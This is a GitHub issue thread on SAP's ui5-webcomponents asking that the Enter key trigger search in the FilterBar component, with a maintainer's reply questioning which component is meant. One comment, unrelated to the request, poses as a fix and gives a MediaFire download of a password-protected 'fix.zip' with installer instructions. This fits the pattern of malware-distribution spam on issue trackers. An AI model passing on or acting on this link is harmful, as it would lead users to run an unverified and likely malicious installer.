### ISSUE TITLE
[FilterBar]: Support enter key to trigger search

### ISSUE THREAD

**Issue by saurabhmehta02** [SAP/ui5-webcomponents#9762]
### Feature Request Description

If we are using the <Input> component in the FilterBar or as search property (search={<Input />}), the search should be triggered when the user presses the Enter key.
This is also mentioned in the fiori guidelines - https://experience.sap.com/fiori-design-web/filter-bar/ 
"In the manual update mode, the search results are updated only when the users click Go or press Enter on their keyboard."

Currently the FilterBar component doesn't trigger search when user presses enter key.
We have some key customers complaining about this behavior. Kindly look into this request.

### Proposed Solution

When user presses enter key, "onGo" event should get triggered.

### Organization

SAP Labs

### Priority

High

### Privacy Policy

- [X] I’m not disclosing any internal or sensitive information.

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by elenastoyanovaa** [comment]
Hello @saurabhmehta02 ,

I am unable to find the FilterBar component in out playground https://sap.github.io/ui5-webcomponents/components/ Are you sure that you are reporting the issue to the right component?

Kind Regards,
Elena
